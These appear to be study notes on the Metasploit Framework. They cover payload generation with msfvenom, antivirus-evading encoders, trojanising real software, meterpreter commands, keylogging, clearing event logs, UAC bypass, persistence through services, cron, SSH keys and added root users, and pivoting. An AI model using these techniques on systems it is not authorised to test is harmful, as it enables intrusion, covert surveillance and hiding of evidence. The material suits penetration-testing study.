The Metasploit Framework (MSF) is an open-source, robust penetration testing and exploitation framework that is used by penetration testers and security researchers worldwide.
Essential Terminology
Exploit - A module that is used to take advantage of vulnerability and is typically paired with a payload.
Payload - Code that is delivered by MSF and remotely executed on the target after successful xploitation. An example of a payload is a reverse shell that initiates a connection from the target system back to the attacker.
Encoder - Used to encode payloads in order to avoid AV detection. For example, shikata_ga_nai is used to encode Windows payloads.
NOPS - Used to ensure that payloads sizes are consistent and ensure the stability of a payload when executed.
Auxiliary - A module that is used to perform additional functionality like port scanning and enumeration.
Unstaged : Payload is sent to system along with exploits
Staged : A staged payload is sent. The first part (stager) contains a payload that is used to establish a reverse connection back to the attacker, download the second part of the payload (stage) and execute it.
The Meterpreter (Meta-Interpreter) payload is an advanced multi-functional payload that is executed in memory on the target system making it difficult to detect.It communicates over a stager socket and provides an attacker with an interactive command interpreter on the target system that facilitates the execution of system commands, file system navigation, keylogging and much more.
Workspaces allow you to keep track of all your osts, scans and activities and are extremely useful when conducting penetration tests as they allow you to sort and organize your data based on the target or organization.
Usage:
Do nmap scan and store output in XML format.Create a workspace. Import results using db_import nmap_xml_result
command.
OR
Use db_nmap to perform nmap scan.
hosts : Host in nmap results services : Services discoverd vulns : Find vulnerabilities
Run following command on meterpreter session.
run autoroute -s IP_to_route_through
FTP
SSH
SMB
SMTP
HTTP
MySql
Generating msfvenom payload
msfvenom –list payloads : To list all payloads msfvenom –list format : To list all formats of payload
Staged payload : /meterpreter/type Unstaged payload : /meterpreter_type
-p : payload path LHOST : Attacker IP LPORT : Attacker Port -f : file type like exe -a : architecture
-e : encoder (-e x86/shikata_ga_nai) -i : iterations of encoding
-x : inject payload in actual software and replace it to exploit -k : keep original functionality of software plus exploit
sessions : Show all ongoing sessions ( -C : Run meterpreter command on any session -l : list active session -k : kill session -n : name session -i : id of session )
sysinfo : System Information getuid : user permission and level download : download file upload : upload file checksum md5 : MD5 checksum getenv PATH : get environment path search : search for file ( -f : file extension -d : directory to search in ) shell : native session ps : process list migrate id : migrate to process execute -f command : execute command on machine
use multi/manage/shell_to_meterpreter to upgrade use sessions -u id
post/windows/manage/migrate : migrate to other service post/windows/manage/archmigrate : migrate architecture
windows/gather/win_privs : Gather user windows privilege windows/gather/enum_logged_on_users : Gather information regarding logged in users windows/gather/checkvm : Check if machine is Virtual machine windows/gather/enum_applications : Enumerate installed application versions windows/gather/enum_av_excluded : Excluded folders from antivirus scan windows/gather/enum_computers : Enumerate computers included in AD Domain. windows/gather/enum_patches : Enumerate patches installed on system windows/gather/enum_shares : Enumerate shares target is part of
windows/local/bypassuac_injection : UAC bypass (Match architecture for payloads)
windows/local/persistence_service : Add persistence via service
windows/manage/enable_rdp : Enable RDP on system
Use net user user password
for adding password to users.
Use xfreerdp /u:username /p:password /v:host to connect to RDP.
Get meterpreter session keyscan_start : Start key logging keyscan_dump : Dump captured key_stroke keyscan_stop : Stop keylogging
Logs can be accessed from Event Viewer We require elevated privilege for clearing logs Use clearev in meterpreter command to clear logs
Modules use to gather information post exploitation phase.
ps aux to find running services check if any service is vulnerable
exploit/unix/local/chkrootkit : To get root privilege
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Add user on system having root privilege and name of service account such as ftp. useradd -m username -s shell passwd username usermod -aG root username usermod -u user_id username
linux/local/cron_persistence : Manipulate cronjob for persistence exploit/linux/local/service_persistence : Add persistence via service post/linux/manage/sshkey_persistence : Add SSH key for persistence
Pivoting is a post exploitation technique that involves utilizing a compromised host to attack other systems on the compromised host’s private internal network.
run autoroute -s ip_subnet
port forwarding via meterpreter session portfwd add -l local_port -p pivot_port -r pivot_machine
While running attack on pivot machine, Change payload to bind payload and set LHOST to machine we have exploited.
GUI version of msfconsole